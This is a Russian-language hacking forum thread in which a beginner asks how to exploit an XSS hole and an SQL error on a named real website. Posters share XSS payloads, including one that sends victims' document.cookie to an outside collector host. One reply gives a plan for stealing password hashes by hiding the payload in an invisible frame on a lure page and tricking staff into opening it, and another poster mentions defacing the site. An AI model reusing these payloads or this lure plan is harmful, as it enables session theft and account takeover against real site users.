Нашел дыру, но не знаю че делать дальше - помогите новичку :)
 

Привет всем, я нашел дыру вот тут -

1. http://wow.crpg.ru/search.php
если сделать так:
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>alert(document.cookie);</script

то вроде все получается, однако это же нечеловечно, хотелось бы поцивелизованнее чтоли... в общем не знаю как и что еще можно оттуда извлечь...

2. а еще там же дыра -
http://wow.crpg.ru/printfeature.php?artid=
если ввести после равно qwerty то выпадает в ошибку базы. Как можно провести хацк? :rolleyes:

1 Можно украсть куки.

2 Это по ходу не дыра.. А ошибка в скрипте.

Угу, второй случай - просто обработка этого qwerty и иже с ними неправильна. Вот скрипт и ругается. Посмотрел бы сам вначале, чем тревогу бить.. видно же что кроме пути к файлу, здесь больше ничё не выцепишь.

А по 1 случаю. ХЗ. помоему хрен что сделаешь)). Хотя я не смотрел, признаюсь).

Тык как цивилизованно украсть то? не пошлешь же ссылку вида
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>img = new Image(); img.src =<a href="http://antichat.ru/cgi-bin/s.jpg">+document.cookie;</script>

Как-бы ее запрятать так, чтоб явно не торчала...

А ошибка в скрипте - не дыра? ))

нет...

КЕЗ не всегда.
"))))"

нет, конечно если там написано
fopem вместо fopen то да, это вообще ничего работать небудет,
но в данном случае это и ест дыра

Ближе к теме, мальчики и девочки :)
с похожей ссылкой удалось сделать дефейс сменой картинки бекграунда, но опять же увидишь, только если полностью набить адрес+код в експлорере...

Сначала выясни - что хранится в куках. Если там есть пасс (хэш пасса), то просто создаешь страницу с нулевым (невидимым фреймом) где ссылка на этот фрейм будет та которую ты нашел. И после всего этого пишешь или по личке или еще кому-нить - так мол и так. Гляньте на страницу (чтобы глянули - прояви фантазию).

p.s. только сначала проверь чтобы все фурычило, иногда неполучится куку перхватить